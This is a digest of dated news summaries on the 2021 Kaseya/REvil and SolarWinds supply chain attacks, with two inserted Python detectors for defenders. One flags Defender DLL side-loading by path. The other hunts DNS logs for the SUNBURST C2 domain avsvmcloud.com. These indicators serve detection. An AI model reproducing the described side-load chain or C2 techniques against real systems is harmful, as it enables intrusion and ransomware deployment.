FERC and NERC publish a whitepaper on SolarWinds and related supply chain compromise

On July 6, 2021, the staff of the FERC and the NERC E-ISAC issued a whitepaper entitled “SolarWinds and Related Supply Chain Compromise – Lessons for the North American Electricity Industry.” The whitepaper describes these major supply chain-related cybersecurity events and the key actions to take to secure systems.

Ref - JD Supra 

_______________________________________________________________________________________

(July 8, 2021)

NJCCIC recommendations on widespread supply chain ransomware attack

The NJCCIC recommends MSPs using VSA follow the guidance from Kaseya and disconnect VSA servers until notified by Kaseya that it is safe to connect them after an update is applied to remediate the exploited vulnerability. A tool to scan systems for signs of exploitation is available and the incident overview and technical details are also provided by Kaseya on their website.

Ref - NJCCIC 

_______________________________________________________________________________________

(July 8, 2021)

Analyzing Supply Chain Attacks

While software vulnerabilities still play a role in breaching organizations’ defenses, the software supply chain introduces an inordinate degree of new opportunities to introduce malicious artifacts and to execute unauthorized activities from within. It is important to note that malware is not a vulnerability, so it can neither be detected nor resolved using the same methods.

Ref - AquaSec 

_______________________________________________________________________________________

(July 8, 2021)

Global ransomware supply-chain attack takes a small Maryland town offline

Leonardtown, a town in Maryland, had been a victim of the massive ransomware attack that breached a popular software made by the information technology company Kaseya. The attack reached Leonardtown through its IT management company, JustTech, which uses the affected Kaseya product.


_______________________________________________________________________________________

(July 7, 2021)

REvil Ransomware Attack on Kaseya VSA - Detailed technical analysis

Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly. It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers and the team at DIVD.nl disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch.

Ref - Varonis 

_______________________________________________________________________________________

(July 7, 2021)

Analyzing the REvil Ransomware attack

In the recent attack on Kaseya, the ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server platform. Security researchers have identified three zero-day vulnerabilities potentially used in attacks against their clients, including Authentication Bypass Vulnerability, Arbitrary File Upload Vulnerability, and Code Injection Vulnerability.

Ref - Qualys 

_______________________________________________________________________________________

(July 7, 2021)

The massive Kaseya ransomware attack - Key things to know and learn

The attack on Kaseya points to a popular target for ransomware attackers: Managed Service Providers. MSPs such as Kaseya's customers allow companies to outsource certain software and services, such as IT management, to third parties, which can help avoid the cost of having to employ such experts in-house.

Ref - CNN 

_______________________________________________________________________________________

(July 7, 2021)

In the Kaseya supply chain ransomware attack, history repeats itself

Though details of the recent international ransomware campaign (via Kaseya) are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

Ref - CyberArk 

_______________________________________________________________________________________

(July 7, 2021)

Deconstructing the REvil Ransomware attack on Kaseya VSA

After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Kaseya VSA administrative access was disabled to the compromised servers and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in their networks.


_______________________________________________________________________________________

(July 7, 2021)

Kaseya VSA ransomware attack, SolarWinds hack share many similarities

Last weekend’s Kaseya VSA supply chain ransomware attack and last year’s giant SolarWinds hack share a number of similarities. The attacks on Kaseya and SolarWinds share the most “sinister point” of compromise. That’s the trust between a vendor and a client. Key among the differences, however, is that the exploit of the Kaseya VSA product led to the injection of ransomware into the endpoints managed by Kaseya VSA on-premises users, while the SolarWinds attack led to data exfiltration.


_______________________________________________________________________________________

(July 7, 2021)

REvil ransomware gang’s major supply chain attack may affect over 1,500 customers

Although it was initially believed that only 50 companies using VSA on-premises were targeted by REvil, the evolving situation reveals more potential victims as numbers climb to the tune of 1,500-2,000 companies likely exposed to downstream impact by this major attack. The number of potential victims can be so much larger because Kaseya’s customers themselves are MSPs who serve a customer base of their own.


_______________________________________________________________________________________

(July 6, 2021)

The key lessons from Kaseya cyber attack

The solution to the Kaseya attack is more than detection and protection. It requires policy, regulations, law enforcement, diplomacy, criminal ecosystem disruption, and reducing the benefit of the crime.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers breached RNC via Synnex in a new attack

The Russian government hackers behind the SolarWinds campaign breached the computer systems of the Republican National Committee through Synnex in a new attack. There is no indication, however, that the RNC itself was hacked or that any RNC information was stolen.

Ref - CRN 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya ransomware: a software supply chain attack or not?

The newly discovered vulnerability, initially known only to the attackers, allowed them to exploit the on-premise version of the Kaseya software, and ultimately conduct the ransomware attack. And, because so many of Kaseya's customers are MSPs, the attackers were able to pass the ransomware attack downstream to as many as 1,500 small and medium-size businesses that outsource everyday IT functions.

Ref - Sonatype 

_______________________________________________________________________________________

(July 6, 2021)

Kaseya says it's seen no sign of a supply chain attack

Kaseya has said it’s been unable to find signs its code was maliciously modified and offered its users a ray of hope with the news that it is testing a patch for its on-prem software and is considering restoring its SaaS services on Tuesday.


_______________________________________________________________________________________

(July 6, 2021)

How can a business ensure the security of its supply chain?

The reality is that supply chain attacks are not going away. In the first quarter of 2021, 137 organizations reported experiencing supply chain attacks at 27 different third-party vendors, while the number of supply chain attacks rose 42% from the previous quarter. Therefore, it becomes important for businesses to mitigate risk when it comes to the increased threat from supply chain attacks.


_______________________________________________________________________________________

(July 6, 2021)

SolarWinds hackers still targeting Microsoft, focus on support staff

Microsoft's Threat Intelligence Center's investigation detected information-stealing malware on a machine belonging to one of Microsoft's customer support agents with access to basic account information for a small number of its customers. The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.


_______________________________________________________________________________________

(July 6, 2021)

Kaseya supply chain ransomware attack - Technical analysis

The threat actor behind this attack identified and exploited a zero-day vulnerability in the Kaseya VSA server. The compromised Kaseya VSA server was used to send a malicious script to all clients that were managed by that VSA server. The script was used to deliver REvil ransomware that encrypts files on the affected systems.

Ref - ZScaler
 
_______________________________________________________________________________________

(July 6, 2021)

Ransomware group connected to JBS incident thought to be behind massive MSP supply chain attack

While most Americans were preparing for the July 4 holiday weekend by picking up burgers and beers, the hackers thought to be responsible for the JBS ransomware incident were readying a supply chain attack timed to hit when IT workers were off duty. An attack on managed service providers (MSPs) making use of Kaseya products is thought to have compromised at least 200 of that company’s clients, and possibly as many as tens of thousands in total.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 5, 2021)

New supply chain ransomware attack targets

The sophisticated supply-chain ransomware attack targeting Kaseya initially leveraged a vulnerability in the Kaseya VSA software to gain access to victim organizations and then used REvil’s RaaS to infect those organizations with ransomware. Reports claim that a malicious update was deployed to the Kaseya VSA interface by the threat actors as an update or hotfix for the Kaseya VSA agent.

Ref - Fortinet 

_______________________________________________________________________________________

(July 5, 2021)

Kaseya crippled by supply chain attack

REvil compromised Kaseya VSA servers and is currently using them to deploy and distribute their ransomware. The ransomware encryptors are contained in the file agent.exe. When this file is activated, both an old yet legitimate copy of Windows Defender, MsMpEng.exe, and the encryptor payload, mpsvc.dll, are dropped into the C:\Windows path for DLL sideloading, a process where a malicious DLL file is loaded in place of a legitimate one.

Ref - Upguard 

_______________________________________________________________________________________

(July 5, 2021)

Real-time prevention of the Kaseya VSA supply chain REvil ransomware attack

In the Kaseya attack, most of the attacked endpoints were Windows servers. This attack is particularly evasive because all the attack chain components are signed with digital certificates, starting from the Kaseya process, continuing with a vulnerable Microsoft Defender process, and ending with the side-loaded signed ransomware.

Ref - Morphisec 
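Because every stage of the chain described in the two entries above (agent.exe, the dropped MsMpEng.exe, and the side-loaded mpsvc.dll) carried a valid signature, a detection that only checks signatures misses it; where the Defender engine runs from and where its DLL is loaded from is the usable signal. The following detector is an added example, not Upguard's, Morphisec's or Kaseya's code: it flags those location anomalies in constructed key=value process-creation and image-load records. The log format, host names, parent paths and the expected Defender install directories are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Directories the Windows Defender engine legitimately runs from.
# Assumption made for this check; adjust to the Defender platform path in use.
EXPECTED_DEFENDER_DIRS = (
    r"C:\Program Files\Windows Defender",
    r"C:\ProgramData\Microsoft\Windows Defender\Platform",
)

# File names from the side-load chain described in the entries above.
DEFENDER_EXE = "msmpeng.exe"
SIDELOADED_DLL = "mpsvc.dll"

# key=value pairs; quoted values may contain spaces (e.g. "Program Files").
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line: str) -> dict:
    """Turn one key=value log line into a dict."""
    return {key: (quoted or bare) for key, quoted, bare in _KV.findall(line)}


def _dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0] if "\\" in path else ""


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _in_expected_dir(path: str) -> bool:
    """True if the file sits in (or below) one of the expected Defender directories."""
    d = _dirname(path).lower()
    return any(d == r.lower() or d.startswith(r.lower() + "\\")
               for r in EXPECTED_DEFENDER_DIRS)


@dataclass
class Finding:
    host: str
    reason: str
    evidence: str


def scan(lines) -> list:
    """Return findings for Defender-engine side-load indicators.

    The `signed` field is deliberately ignored: every component of this chain
    was validly signed, so signature validity alone does not separate the
    legitimate engine from a dropped copy. Location does.
    """
    findings = []
    for line in lines:
        rec = parse_record(line)
        host = rec.get("host", "?")
        event = rec.get("event")
        if event == "process_create":
            image = rec.get("image", "")
            if _basename(image) == DEFENDER_EXE and not _in_expected_dir(image):
                findings.append(Finding(
                    host, "MsMpEng.exe started outside the Defender install directory", image))
        elif event == "image_load":
            proc = rec.get("process", "")
            module = rec.get("module", "")
            if _basename(module) == SIDELOADED_DLL and not _in_expected_dir(module):
                findings.append(Finding(
                    host, "mpsvc.dll loaded from outside the Defender install directory",
                    f"{proc} -> {module}"))
    return findings


# Constructed sample records (not real telemetry). SRV01 shows the pattern from
# the attack chain; WS07 shows a normal Defender start for comparison.
SAMPLE_LOG = [
    'host=SRV01 event=process_create image="C:\\Windows\\MsMpEng.exe" '
    'parent="C:\\Windows\\Temp\\agent.exe" signed=true',
    'host=SRV01 event=image_load process="C:\\Windows\\MsMpEng.exe" '
    'module="C:\\Windows\\mpsvc.dll" signed=true',
    'host=WS07 event=process_create image="C:\\Program Files\\Windows Defender\\MsMpEng.exe" '
    'parent="C:\\Windows\\System32\\services.exe" signed=true',
    'host=WS07 event=image_load process="C:\\Program Files\\Windows Defender\\MsMpEng.exe" '
    'module="C:\\Program Files\\Windows Defender\\mpsvc.dll" signed=true',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.host}] {f.reason}: {f.evidence}")
```

The same two rules translate directly into an EDR or SIEM query over real process and module telemetry; the point is to key on path, not on signer.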

_______________________________________________________________________________________

(July 5, 2021)

Over 1000 organizations globally attacked on Fourth of July weekend, biggest supply chain attack since Sunburst

To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack. 

Ref - CheckPoint

_______________________________________________________________________________________

(July 5, 2021)


US spy agencies investigate Kaseya supply chain attack

President Biden has ordered his intelligence agencies to investigate a major ransomware supply chain attack over the weekend that targeted a vendor of IT software used by managed service providers (MSPs). Suspected to be the work of a REvil affiliate, the attack on Miami-headquartered Kaseya was spotted by its incident response team at around midday on Friday.


_______________________________________________________________________________________

(July 5, 2021)

Hackers’ sophisticated ransomware attack targeted a flaw in IT management

The hackers behind a mass ransomware attack exploited multiple previously unknown vulnerabilities in IT management software made by Kaseya Ltd., the latest sign of the skill and aggressiveness of the Russia-linked group believed responsible for the incidents.

Ref - Fortune 

_______________________________________________________________________________________

(July 5, 2021)


IT for Kaseya defers decision about SaaS restoration after supply chain attack

IT management software provider Kaseya has deferred an announcement about the restoration of its SaaS services, after falling victim to a supply chain attack that has seen its products become a delivery mechanism for the REvil ransomware. On learning of the attack, Kaseya urged customers to pull the plug on their VSA servers, because the attack shuts off administrator access to the suite. The company also shuttered its SaaS services as a precautionary measure.

Ref - The Register 

_______________________________________________________________________________________

(July 4, 2021)

Guidance for MSPs and their customers affected by the Kaseya VSA supply-chain attack

CISA and FBI recommend MSP customers affected by the Kaseya VSA supply-chain attack take immediate action to implement cybersecurity best practices. They are recommended to download and use the Kaseya VSA Detection Tool. Agencies also recommend enabling and enforcing multi-factor authentication (MFA) on every single account that is under the control of the organization.

Ref - US Cert 

_______________________________________________________________________________________

(July 4, 2021)

Kaseya supply chain attack targeting MSPs to deliver REvil ransomware

The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.

Ref - TrueSec

_______________________________________________________________________________________

(July 4, 2021)

How Russian spies hacked the Justice, State, Treasury, Energy and Commerce Departments

The Department of Homeland Security spent billions on a program called "Einstein" to detect cyber attacks on government agencies. The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.

Ref - CBS News 

_______________________________________________________________________________________

(July 4, 2021)

Independence Day: REvil uses supply chain exploits to attack hundreds of businesses

REvil’s operators posted to their “Happy Blog”, claiming that more than a million individual devices were infected by the malicious update. They also said they would be willing to provide a universal decryptor for victims of the attack, on the condition that they are paid $70,000,000 worth of Bitcoin.

Ref - Sophos 

_______________________________________________________________________________________

(July 4, 2021)

How U.S. cyber policy changed after SolarWinds

Since the disclosure of SolarWinds attacks and since the formation of the new government in the United States, several things have changed in the cybersecurity world. The Biden Administration imposed sanctions on Russia, ordered new cybersecurity standards for federal contracts with software companies, and chose the nation's first National Cyber Director.

Ref - CBS News 

_______________________________________________________________________________________

(July 3, 2021)

Kaseya ransomware supply chain attack: Key things to know

Several hundred organizations have been targeted by the REvil (aka Sodinokibi) ransomware in a supply chain attack involving Kaseya VSA software and multiple Managed Service Providers (MSPs) who use it. REvil attacks are usually financially motivated. However, there are some signs that the attacks may be politically motivated disruption.

Ref - Symantec

_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack hits nearly 40 service providers

Threat actors behind the notorious REvil cybercrime operation appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide in a widespread supply-chain ransomware attack. Following the incident, the IT and security management services company said it took immediate steps to shut down its SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised.


_______________________________________________________________________________________

(July 3, 2021)

Kaseya supply-chain attack: What we know so far

Kaseya IT management software, commonly used in Managed Service Provider (MSP) environments, had been hit by another in a series of supply-chain hacks. As with the SolarWinds incident, this latest attack uses a two-step malware delivery process sliding through the back door of tech environments. The cybercriminals behind this attack apparently had monetary gain rather than cyber espionage in their sights, eventually planting ransomware while exploiting the trust relationship between Kaseya and its customers.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware gang executes supply chain attack via malicious Kaseya update

The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions and is using a malicious update for the VSA software to deploy ransomware on enterprise networks.


_______________________________________________________________________________________

(July 2, 2021)

REvil ransomware hits 1,000+ companies in MSP supply-chain attack

Researchers are tracking 20 MSPs where Kaseya VSA was used to encrypt over 1,000 businesses and are working in close collaboration with six of them. They have proof that their customers are being encrypted as well. Kaseya issued a security advisory on their help desk site, warning all VSA customers to immediately shut down their VSA server to prevent the attack's spread while investigating.


_______________________________________________________________________________________

(July 2, 2021)

Kaseya VSA Supply-Chain Ransomware Attack

CISA is taking action to understand and address the recent supply-chain ransomware attack against Kaseya VSA and the multiple managed service providers (MSPs) that employ VSA software. CISA encourages organizations to review the Kaseya advisory and immediately follow their guidance to shut down VSA servers.

Ref - US Cert 

_______________________________________________________________________________________

(July 2, 2021)

Improve supply chain security with intelligence from surface, deep & dark web

In the past several months, the SolarWinds attack and the subsequent fallout have forced organizations to reexamine their supply chain security approach. Mitigating the supply chain threats involves a blended approach that includes secure development processes, vulnerability scanning and management, and endpoint security alongside effective vendor governance practices.


_______________________________________________________________________________________

(July 1, 2021)

Kaseya VSA supply-chain ransomware attack - Sophos report

Sophos said that the supply chain attack, which uses Kaseya VSA to deploy a variant of the REvil ransomware into victims' environments, is geographically dispersed. It appears that the attackers used a zero-day vulnerability to remotely access internet-facing VSA servers.

Ref - Sophos

_______________________________________________________________________________________

(June 30, 2021)

11 Tactics to prevent supply chain attacks

To prevent supply chain attacks, organizations can follow several strategies, including deploying honeytokens, securing privileged access management, and implementing a Zero Trust architecture. They should also plan their security on the assumption that they will be attacked.

Ref - Upguard 

_______________________________________________________________________________________

(June 29, 2021)

Improving the security of your supply chain through integration

To counter the threat of a supply chain incursion, companies are well served by the latest generation of highly specialized threat intelligence solutions. Take a breach and attack simulation (BAS) tool like Cymulate for example. BAS solutions can help reduce supply chain risk by conducting ongoing, automated penetration testing. They identify vulnerabilities by mimicking the tactics used by bad actors and showing you where you’re most exposed.

Ref - Mimecast 

_______________________________________________________________________________________

(June 29, 2021)

Zero-Trust doesn’t mean zero breaches

The detailed and specific answer to any particular breach depends on the actual mechanism incorporated for the initial infection and/or propagation. In the case of SolarWinds, the initial infection threat vector is unknown. Its dissemination technique, on the other hand, is as public as it is horrifying: the previously trusted software supply chain.

Ref - Forrester 

_______________________________________________________________________________________

(June 29, 2021)

Denmark's central bank exposed in SolarWinds hack

Denmark's central bank was compromised in last year's global SolarWinds hacking operation, leaving a "backdoor" to its network open for seven months until it was discovered by U.S. security firm FireEye, Version2 reported, citing documents it obtained under a freedom of information request, including SolarWinds emails.

Ref - Reuters 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies an average of $12 million

A recent ‘2021 Cybersecurity Impact Report’ from IronNet has revealed some interesting facts about Solarwinds attacks. The report is based on interviews with 473 security IT decision-makers from the U.S., U.K., and Singapore who work in the technology, financial, public service, and utility sectors. The survey found that 90% of respondents said their security posture had improved over the last two years, but 86% suffered attacks severe enough to require a meeting of the companies' C-level executives or boards of directors.


_______________________________________________________________________________________

(June 28, 2021)


Some UW institutions used software compromised by Russian hackers - US Officials

Email records show University of Wisconsin System cybersecurity staff raced to determine whether any of its 26 campuses or central office had been impacted by the global SolarWinds hacking incident discovered in December 2020. According to documents, some UW institutions were running the compromised software, though it's unclear whether attackers stole information or disrupted university networks.

Ref - WPR.org 

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds hackers continue the assault with a new Microsoft breach

The nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers. The hacking group also compromised three entities using password-spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of login guesses.

Ref - Wired 

_______________________________________________________________________________________

(June 28, 2021)


Microsoft says new breach discovered in probe of suspected SolarWinds hackers

Microsoft said that an attacker had gained access to one of its customer-service agents and then used information from that to launch hacking attempts against customers. The company said it had found the compromise during its response to hacks by a team it identifies as responsible for earlier major breaches at SolarWinds and Microsoft.

Ref - Reuters

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies in key sectors 11% of total annual revenue

IronNet Cybersecurity released its 2021 Cybersecurity Impact Report assessing timely topics such as the estimated cost per enterprise of the SolarWinds cyber attack, executive-level engagement in attack responses, and the effect of information sharing on an organization’s overall security posture. Among the 85 percent of respondents affected by SolarWinds, nearly one-third said their organization felt a significant financial impact from the attack. In fact, the attack cost affected companies, on average, 11 percent of their annual revenue.


_______________________________________________________________________________________

(June 27, 2021)


IT companies bear brunt of new SolarWinds hacker attacks

IT companies have made up the majority of organizations targeted amid new activity by the group behind last year’s SolarWinds supply-chain attack, with at least one victim coming from Microsoft’s customer support ranks. The attack mostly targeted IT companies, which comprised 57% of total targets, followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services.

Ref - ARNNet

_______________________________________________________________________________________

(June 26, 2021)


Microsoft says SolarWinds hackers attacked three in a new breach

Microsoft Corp. said the hackers behind the SolarWinds cyberattack recently compromised a new trio of victims using access to one of the company’s customer support agents. The hacked portal used by the individual agent contained information for a small number of customers, which the attackers used to launch a highly targeted attack.

Ref - Yahoo 

_______________________________________________________________________________________

(June 26, 2021)


Microsoft admits to signing rootkit malware in supply-chain fiasco

Microsoft has confirmed signing a malicious driver that was being distributed within gaming environments. The driver, called "Netfilter," is in fact a rootkit: it provided no legitimate functionality and was observed communicating with China-based command-and-control (C2) IPs, which is what raised suspicions.


_______________________________________________________________________________________

(June 25, 2021)


The majority of large businesses caught up in supply chain attacks last year

The majority of large enterprises (64 percent) suffered a software supply chain attack last year, according to a report from security company Anchore. The report states that the use of software containers is on the rise thanks to the widespread use of DevOps processes to speed up development. This report highlights that 60 percent of respondents have made securing the software supply chain a top initiative for 2022.

Ref - ITProportal 

_______________________________________________________________________________________

(June 25, 2021)


New Nobelium activity disclosed by Microsoft

The Microsoft Threat Intelligence Center is tracking new activity from the NOBELIUM threat actor, which includes password spray and brute-force attacks. The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted.

Ref - Microsoft 

_______________________________________________________________________________________

(June 24, 2021)


Atlassian bugs could have led to a 1-click takeover

Chained Atlassian bugs could have enabled a one-click supply-chain attack: with a single click, an attacker could have siphoned sensitive information out of Jira, such as security issues filed against Atlassian cloud, Bitbucket, and on-prem products. The flaws could also have enabled an attacker to take over accounts and control some of Atlassian’s applications, including Jira and Confluence.

Ref - ThreatPost 

_______________________________________________________________________________________

(June 24, 2021)


The power of anonymity in supply chain security

A large number of MSPs are managing Microsoft 365 for clients. So it’s critical that they protect Microsoft 365 with an email security solution that is integrated with Microsoft 365 via API, sitting inside Microsoft’s architecture. This architectural structure has a number of advantages, including making the solution invisible to hackers in an MX record query and allowing for internal email scanning, which can thwart lateral phishing and ransomware attacks within Microsoft 365.


_______________________________________________________________________________________

(June 24, 2021)


Shifting left with analytics to identify software supply chain anomalies

The supply chain can be compromised in part due to a lack of security monitoring and oversight for the coding and delivery of software (continuous integration/continuous delivery (CI/CD) pipelines), which creates a dangerous security gap. This gap widens because security testing does not test for changes in the software systems.

 
_______________________________________________________________________________________

(June 24, 2021)


A supply-chain breach: Taking over an Atlassian account

On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some of Atlassian apps connected through SSO. Further details about this have been recently released by Check Point. According to them, once the attacker leverages these vulnerabilities and takes over an account, he can plant backdoors that he can use in the future for his supply-chain attacks.

 
_______________________________________________________________________________________

(June 23, 2021)


SUNBURST: Attack Flow, C2 Protocol, and Prevention

The SUNBURST backdoor is not yet fully understood. Spanning almost 3500 lines of code, “obfuscated” with casual naming, trying to evade shallow review, it has many subtleties yet to uncover. The Cynet research team attempted to gain a better understanding of the command-and-control communication channel, its various stages, and conditions required for execution. The main goal of this investigation is to find infected beaconing machines.

Ref - CYNet 
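The beacon hunt described above, as an added example that is not from the Cynet write-up: it scans resolver log lines for queries under avsvmcloud.com, the domain SUNBURST used for its first-stage C2 (and the one later sinkholed as the killswitch), and reports which internal hosts beaconed. The log format (timestamp, client IP, query name, record type), the sample lines and the DGA-looking labels are constructed for this example; adapt the parser to the real resolver's format.

```python
"""
Hunt for SUNBURST-style beaconing in DNS query logs.

SUNBURST's first stage resolved DGA-generated subdomains of avsvmcloud.com,
so any query under that apex from an internal host is worth pulling for
forensics. The hunt groups matching queries by source host.
"""
from collections import defaultdict

# Apex domain used by SUNBURST's first-stage C2 (public from the FireEye
# reporting). Extend this tuple from your own intel feed if needed.
C2_APEX_DOMAINS = ("avsvmcloud.com",)

# Constructed resolver log: "<timestamp> <client ip> <query name> <type>".
# The long subdomain labels are made up to look like DGA output.
SAMPLE_LOG = """\
2020-12-10T08:01:12Z 10.0.5.21 www.solarwinds.com A
2020-12-10T08:01:15Z 10.0.5.21 r8stkst71ebqgj66ervisu10bdohu0nt.appsync-api.eu-west-1.avsvmcloud.com A
2020-12-10T08:14:02Z 10.0.5.21 avsvmcloud.com.attacker-lookalike.net A
2020-12-10T08:15:40Z 10.0.7.4 update.microsoft.com A
2020-12-10T09:02:11Z 10.0.5.21 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com. A
""".splitlines()


def is_c2_query(qname: str) -> bool:
    """True if qname is a C2 apex or a subdomain of one.

    Matching on the ".apex" suffix (not a bare substring) keeps look-alike
    names such as avsvmcloud.com.attacker-lookalike.net from matching.
    """
    q = qname.rstrip(".").lower()
    return any(q == apex or q.endswith("." + apex) for apex in C2_APEX_DOMAINS)


def hunt(log_lines):
    """Return {client_ip: [(timestamp, query_name), ...]} for beaconing hosts.

    Lines that do not have at least timestamp, client and query name are
    skipped rather than crashing the hunt on a malformed record.
    """
    hits = defaultdict(list)
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        ts, client, qname = parts[0], parts[1], parts[2]
        if is_c2_query(qname):
            hits[client].append((ts, qname.rstrip(".").lower()))
    return dict(hits)


def beacon_counts(log_lines):
    """Convenience view: {client_ip: number of C2 queries}, for triage."""
    return {client: len(queries) for client, queries in hunt(log_lines).items()}


if __name__ == "__main__":
    for client, queries in hunt(SAMPLE_LOG).items():
        print(f"{client}: {len(queries)} C2 queries")
        for ts, qname in queries:
            print(f"  {ts}  {qname}")
```

Hosts listed by this hunt resolved the C2 domain, which means the backdoor was running and past its dormancy period; they should be isolated and imaged rather than simply patched. Feeding the hunt from passive DNS or resolver logs covering the full period since the trojanized Orion build was installed matters more than the parsing detail.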

_______________________________________________________________________________________

(June 22, 2021)


Hackers are trying to attack big companies, and small suppliers are the weakest link

Researchers at cybersecurity company BlueVoyant examined hundreds of SMB defense company subcontractor firms. It was found that over half had severe vulnerabilities within their networks, including unsecured ports and unsupported or unpatched software, making them vulnerable to cyberattacks including data breaches and ransomware.

Ref - ZDNet 

_______________________________________________________________________________________

(June 22, 2021)


An unpatched flaw in Linux Pling Store apps could lead to supply-chain attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for Linux platform that could be potentially abused to stage supply-chain attacks and achieve remote code execution (RCE).


_______________________________________________________________________________________

(June 22, 2021)


Three lessons CISOs can learn from the SolarWinds cyberattack

Here are some lessons that CISOs can learn from the SolarWinds incident to change the way they secure and manage their supply-chain infrastructure. Continuous visibility into interconnected networks, inventory management with good cyber hygiene, implementation of a Zero Trust model, and role-based access to privileged accounts can help minimize the risks.

 
_______________________________________________________________________________________

(June 22, 2021)


Government-mandated SBOMs to throw light on software supply chain security

An SBOM is effectively an ingredient list or a nested inventory, a formal record containing the details and supply chain relationships of various components used in building software. The EO requires NTIA to produce three proposed minimum elements that should go into any SBOM: data fields, operational considerations, and support for automation.

Ref - CSO Online 

_______________________________________________________________________________________

(June 22, 2021)


U.S. SEC probing SolarWinds clients over cyber breach disclosures

The U.S. Securities and Exchange Commission (SEC) has opened a probe into last year's SolarWinds cyber breach, focusing on whether some companies failed to disclose that they had been affected by the unprecedented hack. The SEC sent investigative letters late last week to a number of public issuers and investment firms seeking voluntary information on whether they had been victims of the hack and failed to disclose it.

Ref - Reuters 

_______________________________________________________________________________________

(June 21, 2021)


CISA doesn't know how many US federal agencies use firewalls

The Department of Homeland Security’s top cybersecurity agency doesn’t know how many agencies are segmenting their networks from unwanted outside traffic. The agency provided the answers in response to a February inquiry from Senator Ron Wyden’s office following a heated Senate Intelligence Committee hearing about the breach at the federal contractor SolarWinds.


_______________________________________________________________________________________

(June 21, 2021)


Attacks against container infrastructures increasing, including supply chain attacks

Hiding an attack during a CI build can succeed in most organizations’ CI environments. This attack targets supply-chain processes and could be modified to target other hidden supply chain components, processes, or even the build artifacts themselves, which can pose a severe threat.

 
_______________________________________________________________________________________

(June 21, 2021)


Lessons from the JBS attack for securing the manufacturing supply chain

There are several lessons from the JBS attack that will help manufacturing leaders secure their infrastructure. Organizations need to control access to ecosystem applications and automate identity governance. In addition, they need to strengthen authentication using Continuous Adaptive Risk and Trust (CARTA) and Zero Trust security and secure non-human identities.


_______________________________________________________________________________________

(June 21, 2021)


Software-container supply chain sees spike in attacks

Typosquatting and credential stuffing are two of the most common ways that attackers are attempting to target companies' container infrastructure and the Docker-image supply chain, with attacks climbing nearly 600% in the second half of 2020 compared with the same period a year ago.

Ref - Darkreading 

_______________________________________________________________________________________

(June 21, 2021)


SolarWinds hack could have been deterred by simple security measures

The SolarWinds hack, one of the largest cybersecurity incidents in U.S. history, may have been deterred or minimized if basic security measures had been put in place. CISA agrees that a firewall blocking all outgoing connections to the internet would have neutralized the malware.

Ref - The Hill

_______________________________________________________________________________________

(June 18, 2021)


Google dishes out homemade SLSA to thwart software supply-chain attacks

Google has proposed a framework called SLSA for dealing with supply chain attacks, a security risk exemplified by the recent compromise of the SolarWinds Orion IT monitoring platform. SLSA – short for Supply chain Levels for Software Artifacts and pronounced "salsa" for those inclined to add convenience vowels – aspires to provide security guidance and programmatic assurance to help defend the software build and deployment process.

Ref - The Register 

_______________________________________________________________________________________

(June 18, 2021)


How PAM can protect feds from third-party/ service account cyber attacks

PAM solutions manage and control privileged accounts by isolating, monitoring, recording, and auditing these account sessions, commands, and actions. Third parties and service accounts cannot do their jobs a majority of the time without elevated privileges for access – thus making them a de facto part of the agency enterprise.

Ref - Meritalk

_______________________________________________________________________________________

(June 17, 2021)


Firmware security requires firm supply chain agreements

According to Bloomberg, China’s theft of technology is the biggest threat to corporate America and the US military. And the Russians are experts at infiltrating the supply chain of trusted code as witnessed by the recent SolarWinds breach, along with 20-years’ worth of cyber espionage and attacks. Organizations need to actively embed security controls before they take possession of a product.


_______________________________________________________________________________________

